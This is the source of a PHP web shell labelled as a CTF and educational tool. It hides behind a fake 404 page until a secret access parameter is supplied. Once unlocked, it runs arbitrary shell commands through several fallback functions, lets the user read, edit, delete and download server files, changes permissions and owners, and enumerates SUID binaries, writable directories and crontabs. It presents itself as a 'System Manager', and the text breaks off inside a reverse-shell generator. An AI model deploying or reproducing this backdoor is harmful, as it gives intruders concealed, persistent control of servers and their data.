<?php
// CTF PHP Shell - Educational Purpose Only
error_reporting(0);
@ini_set('display_errors', 0);
@set_time_limit(0);

// Stealth mode - secret access parameter
$access_key = 'vpn'; // Change this!

// Start session for access control
session_start();

// Check access
if(isset($_GET['access']) && $_GET['access'] === $access_key) {
    $_SESSION['authenticated'] = true;
}

if(!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
    // Show fake 404 page
    header("HTTP/1.0 404 Not Found");
    echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>';
    exit;
}

// Obfuscation helpers
$k = 'base64' . '_' . 'decode';
$x = function($d) use ($k) { return $k($d); };

// Get disabled functions
$disabled = @ini_get('disable_functions');
$disabled_list = $disabled ? explode(',', str_replace(' ', '', $disabled)) : array();

function isDisabled($func) {
    global $disabled_list;
    return in_array(trim($func), $disabled_list);
}

// Execute command
function execCmd($cmd) {
    if(!isDisabled('system')) {
        ob_start();
        system($cmd);
        return ob_get_clean();
    } elseif(!isDisabled('shell_exec')) {
        return shell_exec($cmd);
    } elseif(!isDisabled('exec')) {
        exec($cmd, $output);
        return implode("\n", $output);
    } elseif(!isDisabled('passthru')) {
        ob_start();
        passthru($cmd);
        return ob_get_clean();
    } elseif(!isDisabled('popen')) {
        $proc = popen($cmd, 'r');
        $output = '';
        while(!feof($proc)) {
            $output .= fread($proc, 4096);
        }
        pclose($proc);
        return $output;
    }
    return "All command execution functions are disabled";
}

// Recursive directory zip function
function zipDirectory($source, $destination) {
    if(!extension_loaded('zip')) {
        return false;
    }
    
    $zip = new ZipArchive();
    if(!$zip->open($destination, ZipArchive::CREATE | ZipArchive::OVERWRITE)) {
        return false;
    }
    
    $source = realpath($source);
    if(is_dir($source)) {
        $files = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($source, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
        );
        
        foreach($files as $file) {
            $file = realpath($file);
            if(is_dir($file)) {
                $zip->addEmptyDir(str_replace($source . DIRECTORY_SEPARATOR, '', $file . DIRECTORY_SEPARATOR));
            } elseif(is_file($file)) {
                $zip->addFile($file, str_replace($source . DIRECTORY_SEPARATOR, '', $file));
            }
        }
    } elseif(is_file($source)) {
        $zip->addFile($source, basename($source));
    }
    
    return $zip->close();
}

// Handle actions
$cwd = getcwd();

// Change directory (POST)
if(isset($_POST['chdir'])) {
    $newdir = $x($_POST['chdir']);
    if(is_dir($newdir)) {
        $cwd = realpath($newdir);
    }
}

// Execute command (POST)
if(isset($_POST['cmd'])) {
    header('Content-Type: text/plain');
    $cmd = $_POST['cmd'];
    echo execCmd($cmd . ' 2>&1');
    exit;
}

// View file (POST) - returns JSON for inline display
if(isset($_POST['view'])) {
    header('Content-Type: application/json');
    $file = $x($_POST['view']);
    
    if(file_exists($file) && is_file($file)) {
        $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
        $content = file_get_contents($file);
        $filename = basename($file);
        
        // Determine if it's a PHP file
        $is_php = in_array($ext, array('php', 'php3', 'php4', 'php5', 'phtml', 'phps'));
        
        echo json_encode(array(
            'success' => true,
            'filename' => $filename,
            'content' => $content,
            'is_php' => $is_php
        ));
    } else {
        echo json_encode(array(
            'success' => false,
            'message' => 'File not found or not readable'
        ));
    }
    exit;
}

// Edit file - load for editing (POST)
if(isset($_POST['edit'])) {
    header('Content-Type: application/json');
    $file = $x($_POST['edit']);
    
    if(file_exists($file) && is_file($file)) {
        $content = file_get_contents($file);
        $filename = basename($file);
        
        echo json_encode(array(
            'success' => true,
            'filename' => $filename,
            'content' => $content,
            'path' => $_POST['edit']
        ));
    } else {
        echo json_encode(array(
            'success' => false,
            'message' => 'File not found or not readable'
        ));
    }
    exit;
}

// Save file (POST)
if(isset($_POST['save']) && isset($_POST['content'])) {
    header('Content-Type: application/json');
    $file = $x($_POST['save']);
    $content = $_POST['content'];
    
    $result = @file_put_contents($file, $content);
    
    if($result !== false) {
        echo json_encode(array(
            'success' => true,
            'message' => 'File saved successfully (' . number_format($result) . ' bytes)'
        ));
    } else {
        echo json_encode(array(
            'success' => false,
            'message' => 'Failed to save file. Check permissions.'
        ));
    }
    exit;
}

// Download file (POST)
if(isset($_POST['download'])) {
    $file = $x($_POST['download']);
    if(file_exists($file) && is_file($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-Length: ' . filesize($file));
        readfile($file);
    }
    exit;
}

// Download directory as zip (POST)
if(isset($_POST['downloaddir'])) {
    header('Content-Type: application/json');
    $dir = $x($_POST['downloaddir']);
    
    if(!extension_loaded('zip')) {
        echo json_encode(array(
            'success' => false,
            'message' => 'ZIP extension is not loaded'
        ));
        exit;
    }
    
    if(!is_dir($dir)) {
        echo json_encode(array(
            'success' => false,
            'message' => 'Directory not found'
        ));
        exit;
    }
    
    $dirname = basename($dir);
    $zipname = $dirname . '_' . date('Ymd_His') . '.zip';
    $zippath = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $zipname;
    
    if(zipDirectory($dir, $zippath)) {
        echo json_encode(array(
            'success' => true,
            'zippath' => base64_encode($zippath),
            'zipname' => $zipname,
            'message' => 'Directory compressed successfully'
        ));
    } else {
        echo json_encode(array(
            'success' => false,
            'message' => 'Failed to create zip archive'
        ));
    }
    exit;
}

// Delete file/directory (POST)
if(isset($_POST['delete'])) {
    header('Content-Type: application/json');
    $path = $x($_POST['delete']);
    $success = false;
    $message = '';
    
    if(file_exists($path)) {
        if(is_file($path)) {
            $success = @unlink($path);
            $message = $success ? 'File deleted successfully' : 'Failed to delete file';
        } elseif(is_dir($path)) {
            $success = @rmdir($path);
            $message = $success ? 'Directory deleted successfully' : 'Failed to delete directory (may not be empty)';
        }
    } else {
        $message = 'Path does not exist';
    }
    
    echo json_encode(array('success' => $success, 'message' => $message));
    exit;
}

// Mass delete (POST)
if(isset($_POST['mass_delete']) && isset($_POST['paths'])) {
    header('Content-Type: application/json');
    $paths = json_decode($_POST['paths'], true);
    $results = array('success' => 0, 'failed' => 0, 'messages' => array());
    
    foreach($paths as $encoded_path) {
        $path = $x($encoded_path);
        if(file_exists($path)) {
            if(is_file($path)) {
                if(@unlink($path)) {
                    $results['success']++;
                } else {
                    $results['failed']++;
                    $results['messages'][] = 'Failed to delete: ' . basename($path);
                }
            } elseif(is_dir($path)) {
                if(@rmdir($path)) {
                    $results['success']++;
                } else {
                    $results['failed']++;
                    $results['messages'][] = 'Failed to delete dir: ' . basename($path);
                }
            }
        }
    }
    
    echo json_encode($results);
    exit;
}

// Mass download (POST)
if(isset($_POST['mass_download']) && isset($_POST['paths'])) {
    $paths_json = $_POST['paths'];
    $paths = json_decode($paths_json, true);
    
    if(!extension_loaded('zip')) {
        header('Content-Type: application/json');
        echo json_encode(array('success' => false, 'message' => 'ZIP extension not loaded'));
        exit;
    }
    
    $zipname = 'bulk_download_' . date('Ymd_His') . '.zip';
    $zippath = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $zipname;
    
    $zip = new ZipArchive();
    if($zip->open($zippath, ZipArchive::CREATE | ZipArchive::OVERWRITE)) {
        foreach($paths as $encoded_path) {
            $path = $x($encoded_path);
            if(file_exists($path) && is_file($path)) {
                $zip->addFile($path, basename($path));
            }
        }
        $zip->close();
        
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . $zipname . '"');
        header('Content-Length: ' . filesize($zippath));
        readfile($zippath);
        @unlink($zippath);
    }
    exit;
}

// Change permissions (POST)
if(isset($_POST['chmod']) && isset($_POST['perms'])) {
    header('Content-Type: application/json');
    $path = $x($_POST['chmod']);
    $perms = $_POST['perms'];
    
    $octal = octdec($perms);
    $success = @chmod($path, $octal);
    
    echo json_encode(array(
        'success' => $success,
        'message' => $success ? 'Permissions changed successfully' : 'Failed to change permissions'
    ));
    exit;
}

// Change owner (POST)
if(isset($_POST['chown']) && isset($_POST['owner'])) {
    header('Content-Type: application/json');
    $path = $x($_POST['chown']);
    $owner = $_POST['owner'];
    
    $success = @chown($path, $owner);
    
    echo json_encode(array(
        'success' => $success,
        'message' => $success ? 'Owner changed successfully' : 'Failed to change owner (may need root)'
    ));
    exit;
}

// Rename file/directory (POST)
if(isset($_POST['rename']) && isset($_POST['newname'])) {
    header('Content-Type: application/json');
    $oldpath = $x($_POST['rename']);
    $newname = $_POST['newname'];
    $success = false;
    $message = '';
    
    if(file_exists($oldpath)) {
        $dir = dirname($oldpath);
        $newpath = $dir . DIRECTORY_SEPARATOR . $newname;
        
        if(file_exists($newpath)) {
            $message = 'A file/directory with that name already exists';
        } else {
            $success = @rename($oldpath, $newpath);
            $message = $success ? 'Renamed successfully' : 'Failed to rename';
        }
    } else {
        $message = 'Path does not exist';
    }
    
    echo json_encode(array('success' => $success, 'message' => $message));
    exit;
}

// Find SUID binaries (POST)
if(isset($_POST['find_suid'])) {
    header('Content-Type: text/plain');
    echo execCmd('find / -perm -4000 -type f 2>/dev/null');
    exit;
}

// Find writable directories (POST)
if(isset($_POST['find_writable'])) {
    header('Content-Type: text/plain');
    echo execCmd('find / -writable -type d 2>/dev/null');
    exit;
}

// View crontab (POST)
if(isset($_POST['view_cron'])) {
    header('Content-Type: text/plain');
    $output = execCmd('crontab -l 2>/dev/null');
    $output .= "\n\n=== System Crontab ===\n";
    $output .= execCmd('cat /etc/crontab 2>/dev/null');
    $output .= "\n\n=== Cron.d ===\n";
    $output .= execCmd('ls -la /etc/cron.d/ 2>/dev/null');
    echo $output;
    exit;
}

// Get directory listing (POST)
if(isset($_POST['listdir'])) {
    header('Content-Type: application/json');
    $dir = $x($_POST['listdir']);
    if(is_dir($dir)) {
        $cwd = realpath($dir);
        $files = @scandir($cwd);
        if($files === false) $files = array();
        
        $result = array();
        foreach($files as $file) {
            if($file == '.' || $file == '..') {
                if($file == '..' && dirname($cwd) != $cwd) {
                    $result[] = array(
                        'name' => '..',
                        'is_dir' => true,
                        'size' => '-',
                        'mtime' => '-',
                        'perms' => '-',
                        'owner' => '-',
                        'path' => base64_encode(dirname($cwd))
                    );
                }
                continue;
            }
            
            $filepath = $cwd . DIRECTORY_SEPARATOR . $file;
            $is_dir = is_dir($filepath);
            $perms = @substr(sprintf('%o', fileperms($filepath)), -4);
            $owner = @posix_getpwuid(fileowner($filepath))['name'] ?? fileowner($filepath);
            
            $result[] = array(
                'name' => $file,
                'is_dir' => $is_dir,
                'size' => $is_dir ? '-' : number_format(filesize($filepath)) . ' B',
                'mtime' => date('Y-m-d H:i', filemtime($filepath)),
                'perms' => $perms,
                'owner' => $owner,
                'path' => base64_encode($filepath)
            );
        }
        
        echo json_encode(array(
            'cwd' => $cwd,
            'files' => $result
        ));
    }
    exit;
}

// Get directory listing for initial load
$files = @scandir($cwd);
if($files === false) $files = array();

// Get loaded extensions
$extensions = get_loaded_extensions();
sort($extensions);
$ext_columns = array_chunk($extensions, ceil(count($extensions) / 3));

// Get server name for title
$server_name = $_SERVER['SERVER_NAME'] ?? $_SERVER['HTTP_HOST'] ?? 'Unknown Server';

// Get server IP for reverse shell generator
$server_ip = $_SERVER['SERVER_ADDR'] ?? '0.0.0.0';

?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title><?php echo htmlspecialchars($server_name); ?> - System Manager</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/monokai-sublime.min.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/languages/php.min.js"></script>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: #1e1e1e;
            color: #d4d4d4;
            padding: 20px;
        }
        .container {
            max-width: 1400px;
            margin: 0 auto;
        }
        h1 {
            color: #4ec9b0;
            margin-bottom: 20px;
            font-size: 24px;
        }
        .section {
            background: #252526;
            border: 1px solid #3e3e42;
            border-radius: 4px;
            padding: 15px;
            margin-bottom: 20px;
        }
        .section h2 {
            color: #4fc1ff;
            font-size: 16px;
            margin-bottom: 10px;
            padding-bottom: 8px;
            border-bottom: 1px solid #3e3e42;
        }
        .info-grid {
            display: grid;
            grid-template-columns: 150px 1fr;
            gap: 8px;
            font-size: 13px;
        }
        .info-label {
            color: #9cdcfe;
            font-weight: bold;
        }
        .info-value {
            color: #ce9178;
            word-break: break-all;
        }
        .extensions-grid {
            display: grid;
            grid-template-columns: repeat(3, 1fr);
            gap: 15px;
            margin-top: 10px;
        }
        .extensions-column {
            font-size: 12px;
            color: #d4d4d4;
        }
        .extensions-column div {
            padding: 2px 0;
        }
        .cmd-form {
            display: flex;
            gap: 10px;
            margin-bottom: 10px;
        }
        input[type="text"], input[type="number"] {
            flex: 1;
            background: #3c3c3c;
            border: 1px solid #5a5a5a;
            color: #d4d4d4;
            padding: 8px 12px;
            border-radius: 3px;
            font-family: 'Consolas', monospace;
            font-size: 13px;
        }
        input[type="text"]:focus, input[type="number"]:focus {
            outline: none;
            border-color: #007acc;
        }
        input[type="checkbox"] {
            width: 16px;
            height: 16px;
            cursor: pointer;
        }
        textarea {
            width: 100%;
            background: #1e1e1e;
            border: 1px solid #3e3e42;
            color: #d4d4d4;
            padding: 12px;
            border-radius: 3px;
            font-family: 'Consolas', monospace;
            font-size: 13px;
            line-height: 1.5;
            resize: vertical;
            min-height: 400px;
        }
        textarea:focus {
            outline: none;
            border-color: #007acc;
        }
        button, .btn {
            background: #0e639c;
            color: white;
            border: none;
            padding: 8px 20px;
            border-radius: 3px;
            cursor: pointer;
            font-size: 13px;
            font-weight: bold;
        }
        button:hover, .btn:hover {
            background: #1177bb;
        }
        .btn-success {
            background: #28a745;
        }
        .btn-success:hover {
            background: #218838;
        }
        .btn-warning {
            background: #ffc107;
            color: #000;
        }
        .btn-warning:hover {
            background: #e0a800;
        }
        .btn-danger {
            background: #d73a49;
        }
        .btn-danger:hover {
            background: #e74c3c;
        }
        .btn-small {
            padding: 4px 10px;
            font-size: 11px;
        }
        .output {
            background: #1e1e1e;
            border: 1px solid #3e3e42;
            padding: 12px;
            border-radius: 3px;
            font-family: 'Consolas', monospace;
            font-size: 12px;
            white-space: pre-wrap;
            word-wrap: break-word;
            max-height: 400px;
            overflow-y: auto;
            color: #cccccc;
        }
        .file-browser {
            font-size: 13px;
        }
        .dir-path {
            background: #3c3c3c;
            padding: 8px 12px;
            border-radius: 3px;
            margin-bottom: 10px;
            font-family: 'Consolas', monospace;
            color: #ce9178;
            display: flex;
            align-items: center;
            justify-content: space-between;
            flex-wrap: wrap;
        }
        .breadcrumb-container {
            display: flex;
            align-items: center;
            flex: 1;
        }
        .nav-buttons {
            display: flex;
            gap: 5px;
            margin-right: 10px;
        }
        .nav-btn {
            background: #2d2d30;
            color: #d4d4d4;
            border: 1px solid #3e3e42;
            padding: 4px 8px;
            border-radius: 3px;
            cursor: pointer;
            font-size: 16px;
        }
        .nav-btn:hover:not(:disabled) {
            background: #3e3e42;
        }
        .nav-btn:disabled {
            opacity: 0.3;
            cursor: not-allowed;
        }
        .breadcrumb {
            display: flex;
            align-items: center;
            flex-wrap: wrap;
        }
        .breadcrumb-item {
            color: #4fc1ff;
            cursor: pointer;
            padding: 2px 4px;
            border-radius: 2px;
        }
        .breadcrumb-item:hover {
            background: #2a2d2e;
            text-decoration: underline;
        }
        .breadcrumb-separator {
            color: #858585;
            margin: 0 4px;
            user-select: none;
        }
        .breadcrumb-icon {
            margin-right: 8px;
        }
        .mass-actions {
            background: #2d2d30;
            padding: 8px 12px;
            border-radius: 3px;
            margin-bottom: 10px;
            display: none;
            gap: 10px;
            align-items: center;
        }
        .mass-actions.active {
            display: flex;
        }
        table {
            width: 100%;
            border-collapse: collapse;
        }
        th {
            background: #2d2d30;
            padding: 8px;
            text-align: left;
            color: #4fc1ff;
            border-bottom: 2px solid #3e3e42;
            font-weight: normal;
        }
        td {
            padding: 6px 8px;
            border-bottom: 1px solid #3e3e42;
        }
        tr:hover {
            background: #2a2d2e;
        }
        .icon {
            display: inline-block;
            width: 16px;
            text-align: center;
            margin-right: 5px;
        }
        .dir { color: #4ec9b0; }
        .file { color: #d4d4d4; }
        a {
            color: #4fc1ff;
            text-decoration: none;
            cursor: pointer;
        }
        a:hover {
            text-decoration: underline;
        }
        .actions {
            white-space: nowrap;
        }
        .actions a {
            margin-right: 10px;
            font-size: 12px;
        }
        .delete-link {
            color: #f48771 !important;
        }
        .disabled-funcs {
            color: #f48771;
            font-size: 12px;
        }
        .loading {
            color: #4ec9b0;
            display: none;
        }
        .modal {
            display: none;
            position: fixed;
            z-index: 1000;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0,0,0,0.8);
        }
        .modal-content {
            background-color: #252526;
            margin: 5% auto;
            padding: 0;
            border: 1px solid #3e3e42;
            border-radius: 4px;
            width: 90%;
            max-width: 1200px;
            max-height: 85vh;
            display: flex;
            flex-direction: column;
        }
        .modal-header {
            background: #2d2d30;
            padding: 15px 20px;
            border-bottom: 1px solid #3e3e42;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        .modal-header h3 {
            color: #4fc1ff;
            margin: 0;
            font-size: 16px;
        }
        .modal-header-buttons {
            display: flex;
            gap: 10px;
            align-items: center;
        }
        .close-btn {
            color: #858585;
            font-size: 28px;
            font-weight: bold;
            cursor: pointer;
            background: none;
            border: none;
            padding: 0;
            width: 30px;
            height: 30px;
            line-height: 28px;
        }
        .close-btn:hover {
            color: #d4d4d4;
        }
        .modal-body {
            padding: 20px;
            overflow-y: auto;
            flex: 1;
        }
        .file-content {
            background: #1e1e1e;
            border: 1px solid #3e3e42;
            border-radius: 3px;
            padding: 15px;
            font-family: 'Consolas', monospace;
            font-size: 13px;
            line-height: 1.5;
            overflow-x: auto;
        }
        .file-content pre {
            margin: 0;
        }
        .file-content code {
            background: transparent;
        }
        .hljs {
            background: #23241f;
            padding: 0;
        }
        .line-numbers {
            display: inline-block;
            padding-right: 15px;
            margin-right: 15px;
            border-right: 1px solid #3e3e42;
            color: #858585;
            text-align: right;
            user-select: none;
            min-width: 40px;
        }
        .small-modal .modal-content {
            width: 500px;
            max-height: none;
        }
        .small-modal .modal-body {
            padding: 20px;
        }
        .small-modal input, .small-modal select {
            width: 100%;
            margin-bottom: 15px;
        }
        .modal-buttons {
            display: flex;
            gap: 10px;
            justify-content: flex-end;
        }
        .save-status {
            color: #4ec9b0;
            font-size: 13px;
        }
        .form-group {
            margin-bottom: 15px;
        }
        .form-group label {
            display: block;
            margin-bottom: 5px;
            color: #9cdcfe;
            font-size: 13px;
        }
        .form-group select {
            background: #3c3c3c;
            border: 1px solid #5a5a5a;
            color: #d4d4d4;
            padding: 8px 12px;
            border-radius: 3px;
            font-size: 13px;
        }
        .revshell-code {
            background: #1e1e1e;
            border: 1px solid #3e3e42;
            padding: 12px;
            border-radius: 3px;
            font-family: 'Consolas', monospace;
            font-size: 12px;
            margin-top: 10px;
            white-space: pre-wrap;
            word-wrap: break-word;
            color: #d4d4d4;
        }
        .tool-buttons {
            display: flex;
            gap: 10px;
            flex-wrap: wrap;
        }
        .command-history {
            max-height: 200px;
            overflow-y: auto;
            background: #1e1e1e;
            border: 1px solid #3e3e42;
            padding: 10px;
            border-radius: 3px;
            margin-top: 10px;
        }
        .history-item {
            padding: 5px;
            margin: 2px 0;
            background: #2d2d30;
            border-radius: 2px;
            font-family: 'Consolas', monospace;
            font-size: 12px;
            cursor: pointer;
        }
        .history-item:hover {
            background: #3e3e42;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>⚙️ System Manager - <?php echo htmlspecialchars($server_name); ?></h1>
        
        <div class="section">
            <h2>System Information</h2>
            <div class="info-grid">
                <div class="info-label">PHP Version:</div>
                <div class="info-value"><?php echo PHP_VERSION; ?></div>
                
                <div class="info-label">Zend Version:</div>
                <div class="info-value"><?php echo zend_version(); ?></div>
                
                <div class="info-label">Server Software:</div>
                <div class="info-value"><?php echo $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'; ?></div>
                
                <div class="info-label">System:</div>
                <div class="info-value"><?php echo php_uname(); ?></div>
                
                <div class="info-label">Current User:</div>
                <div class="info-value"><?php echo get_current_user() . ' (UID: ' . getmyuid() . ', GID: ' . getmygid() . ')'; ?></div>
                
                <div class="info-label">Server IP:</div>
                <div class="info-value"><?php echo $server_ip; ?></div>
                
                <div class="info-label">Client IP:</div>
                <div class="info-value"><?php echo $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; ?></div>
                
                <div class="info-label">Document Root:</div>
                <div class="info-value"><?php echo $_SERVER['DOCUMENT_ROOT'] ?? 'Unknown'; ?></div>
                
                <div class="info-label">Disabled Functions:</div>
                <div class="info-value disabled-funcs"><?php echo $disabled ? $disabled : 'None'; ?></div>
                
                <div class="info-label">Memory Limit:</div>
                <div class="info-value"><?php echo ini_get('memory_limit'); ?></div>
                
                <div class="info-label">Max Execution Time:</div>
                <div class="info-value"><?php echo ini_get('max_execution_time'); ?> seconds</div>
                
                <div class="info-label">Upload Max Size:</div>
                <div class="info-value"><?php echo ini_get('upload_max_filesize'); ?></div>
            </div>
            
            <h2 style="margin-top: 20px;">Quick Actions</h2>
            <div class="tool-buttons">
                <button onclick="showPhpInfo()">📊 PHP Info</button>
                <button onclick="showRevShell()">🔌 Reverse Shell</button>
                <button onclick="findSUID()">🔍 Find SUID</button>
                <button onclick="findWritable()">📝 Find Writable</button>
                <button onclick="viewCron()">⏰ View Crontabs</button>
            </div>
            
            <h2 style="margin-top: 20px;">Loaded PHP Extensions (<?php echo count($extensions); ?>)</h2>
            <div class="extensions-grid">
                <?php foreach($ext_columns as $column): ?>
                    <div class="extensions-column">
                        <?php foreach($column as $ext): ?>
                            <div>• <?php echo htmlspecialchars($ext); ?></div>
                        <?php endforeach; ?>
                    </div>
                <?php endforeach; ?>
            </div>
        </div>

        <div class="section">
            <h2>Command Execution</h2>
            <form class="cmd-form" onsubmit="runCommand(event)">
                <input type="text" id="cmdInput" placeholder="Enter command (e.g., whoami, ls -la, cat /etc/passwd)" autofocus>
                <button type="submit">Execute</button>
                <button type="button" onclick="toggleHistory()">History</button>
            </form>
            <div class="loading" id="loading">Executing...</div>
            <div class="output" id="output">Output will appear here...</div>
            <div class="command-history" id="commandHistory" style="display: none;"></div>
        </div>

        <div class="section">
            <h2>File Browser</h2>
            <div class="file-browser">
                <div class="dir-path">
                    <div class="breadcrumb-container">
                        <div class="nav-buttons">
                            <button class="nav-btn" id="backBtn" onclick="navigateBack()" disabled>◀</button>
                            <button class="nav-btn" id="forwardBtn" onclick="navigateForward()" disabled>▶</button>
                        </div>
                        <span class="breadcrumb-icon">📁</span>
                        <div class="breadcrumb" id="breadcrumb">
                            <?php 
                            $parts = explode(DIRECTORY_SEPARATOR, $cwd);
                            $path = '';
                            foreach($parts as $i => $part) {
                                if($part === '') {
                                    if($i === 0) {
                                        $path = DIRECTORY_SEPARATOR;
                                        echo '<span class="breadcrumb-item" onclick="changeDir(\'' . base64_encode($path) . '\')">'. DIRECTORY_SEPARATOR .'</span>';
                                        if(count($parts) > 2) echo '<span class="breadcrumb-separator">/</span>';
                                    }
                                    continue;
                                }
                                $path .= ($path === DIRECTORY_SEPARATOR ? '' : DIRECTORY_SEPARATOR) . $part;
                                echo '<span class="breadcrumb-item" onclick="changeDir(\'' . base64_encode($path) . '\')">' . htmlspecialchars($part) . '</span>';
                                if($i < count($parts) - 1 && $parts[$i + 1] !== '') {
                                    echo '<span class="breadcrumb-separator">/</span>';
                                }
                            }
                            ?>
                        </div>
                    </div>
                </div>
                
                <div class="mass-actions" id="massActions">
                    <span id="selectedCount">0 selected</span>
                    <button class="btn btn-small" onclick="massDownload()">Download Selected</button>
                    <button class="btn btn-small btn-danger" onclick="massDelete()">Delete Selected</button>
                    <button class="btn btn-small" onclick="clearSelection()">Clear Selection</button>
                </div>
                
                <table>
                    <thead>
                        <tr>
                            <th style="width: 3%;"><input type="checkbox" id="selectAll" onchange="toggleSelectAll()"></th>
                            <th style="width: 35%;">Name</th>
                            <th style="width: 10%;">Size</th>
                            <th style="width: 12%;">Modified</th>
                            <th style="width: 6%;">Perms</th>
                            <th style="width: 8%;">Owner</th>
                            <th style="width: 26%;">Actions</th>
                        </tr>
                    </thead>
                    <tbody id="fileList">
                        <?php if(dirname($cwd) != $cwd): ?>
                        <tr>
                            <td></td>
                            <td class="dir">
                                <span class="icon">📁</span>
                                <a onclick="changeDir('<?php echo base64_encode(dirname($cwd)); ?>')">..</a>
                            </td>
                            <td>-</td>
                            <td>-</td>
                            <td>-</td>
                            <td>-</td>
                            <td>-</td>
                        </tr>
                        <?php endif; ?>
                        
                        <?php foreach($files as $file): ?>
                            <?php if($file == '.' || $file == '..') continue; ?>
                            <?php 
                                $filepath = $cwd . DIRECTORY_SEPARATOR . $file;
                                $is_dir = is_dir($filepath);
                                $size = $is_dir ? '-' : number_format(filesize($filepath)) . ' B';
                                $mtime = date('Y-m-d H:i', filemtime($filepath));
                                $perms = @substr(sprintf('%o', fileperms($filepath)), -4);
                                $owner = @posix_getpwuid(fileowner($filepath))['name'] ?? fileowner($filepath);
                                $encoded_path = base64_encode($filepath);
                            ?>
                            <tr>
                                <td><input type="checkbox" class="file-select" data-path="<?php echo $encoded_path; ?>" onchange="updateSelection()"></td>
                                <td class="<?php echo $is_dir ? 'dir' : 'file'; ?>">
                                    <span class="icon"><?php echo $is_dir ? '📁' : '📄'; ?></span>
                                    <?php if($is_dir): ?>
                                        <a onclick="changeDir('<?php echo $encoded_path; ?>')"><?php echo htmlspecialchars($file); ?></a>
                                    <?php else: ?>
                                        <?php echo htmlspecialchars($file); ?>
                                    <?php endif; ?>
                                </td>
                                <td><?php echo $size; ?></td>
                                <td><?php echo $mtime; ?></td>
                                <td><a onclick="showChmod('<?php echo $encoded_path; ?>', '<?php echo $perms; ?>')"><?php echo $perms; ?></a></td>
                                <td><a onclick="showChown('<?php echo $encoded_path; ?>', '<?php echo htmlspecialchars($owner); ?>')"><?php echo htmlspecialchars($owner); ?></a></td>
                                <td class="actions">
                                    <?php if($is_dir): ?>
                                        <a onclick="downloadDirectory('<?php echo $encoded_path; ?>', '<?php echo htmlspecialchars($file); ?>')">ZIP</a>
                                    <?php else: ?>
                                        <a onclick="viewFile('<?php echo $encoded_path; ?>')">View</a>
                                        <a onclick="editFile('<?php echo $encoded_path; ?>')">Edit</a>
                                        <a onclick="downloadFile('<?php echo $encoded_path; ?>')">DL</a>
                                    <?php endif; ?>
                                    <a onclick="renameFile('<?php echo $encoded_path; ?>', '<?php echo htmlspecialchars($file); ?>')">Rename</a>
                                    <a class="delete-link" onclick="deleteFile('<?php echo $encoded_path; ?>', '<?php echo htmlspecialchars($file); ?>')">Del</a>
                                </td>
                            </tr>
                        <?php endforeach; ?>
                    </tbody>
                </table>
            </div>
        </div>
    </div>

    <!-- File Viewer Modal -->
    <div id="fileViewerModal" class="modal">
        <div class="modal-content">
            <div class="modal-header">
                <h3 id="fileViewerTitle">📄 File Viewer</h3>
                <button class="close-btn" onclick="closeFileViewer()">&times;</button>
            </div>
            <div class="modal-body">
                <div class="file-content" id="fileViewerContent"></div>
            </div>
        </div>
    </div>

    <!-- File Editor Modal -->
    <div id="fileEditorModal" class="modal">
        <div class="modal-content">
            <div class="modal-header">
                <h3 id="fileEditorTitle">✏️ File Editor</h3>
                <div class="modal-header-buttons">
                    <span class="save-status" id="saveStatus"></span>
                    <button class="btn btn-success" onclick="saveFile()">💾 Save</button>
                    <button class="close-btn" onclick="closeFileEditor()">&times;</button>
                </div>
            </div>
            <div class="modal-body">
                <textarea id="fileEditorContent" spellcheck="false"></textarea>
            </div>
        </div>
    </div>

    <!-- Rename Modal -->
    <div id="renameModal" class="modal small-modal">
        <div class="modal-content">
            <div class="modal-header">
                <h3>Rename File/Directory</h3>
                <button class="close-btn" onclick="closeRenameModal()">&times;</button>
            </div>
            <div class="modal-body">
                <input type="text" id="renameInput" placeholder="Enter new name">
                <div class="modal-buttons">
                    <button onclick="closeRenameModal()">Cancel</button>
                    <button onclick="confirmRename()">Rename</button>
                </div>
            </div>
        </div>
    </div>

    <!-- Chmod Modal -->
    <div id="chmodModal" class="modal small-modal">
        <div class="modal-content">
            <div class="modal-header">
                <h3>Change Permissions</h3>
                <button class="close-btn" onclick="closeChmodModal()">&times;</button>
            </div>
            <div class="modal-body">
                <div class="form-group">
                    <label>Permissions (octal, e.g., 0755)</label>
                    <input type="text" id="chmodInput" placeholder="0755" maxlength="4">
                </div>
                <div class="modal-buttons">
                    <button onclick="closeChmodModal()">Cancel</button>
                    <button onclick="confirmChmod()">Change</button>
                </div>
            </div>
        </div>
    </div>

    <!-- Chown Modal -->
    <div id="chownModal" class="modal small-modal">
        <div class="modal-content">
            <div class="modal-header">
                <h3>Change Owner</h3>
                <button class="close-btn" onclick="closeChownModal()">&times;</button>
            </div>
            <div class="modal-body">
                <div class="form-group">
                    <label>Owner (username or UID)</label>
                    <input type="text" id="chownInput" placeholder="www-data">
                </div>
                <div class="modal-buttons">
                    <button onclick="closeChownModal()">Cancel</button>
                    <button onclick="confirmChown()">Change</button>
                </div>
            </div>
        </div>
    </div>

    <!-- Reverse Shell Modal -->
    <div id="revshellModal" class="modal">
        <div class="modal-content">
            <div class="modal-header">
                <h3>🔌 Reverse Shell Generator</h3>
                <button class="close-btn" onclick="closeRevShell()">&times;</button>
            </div>
            <div class="modal-body">
                <div class="form-group">
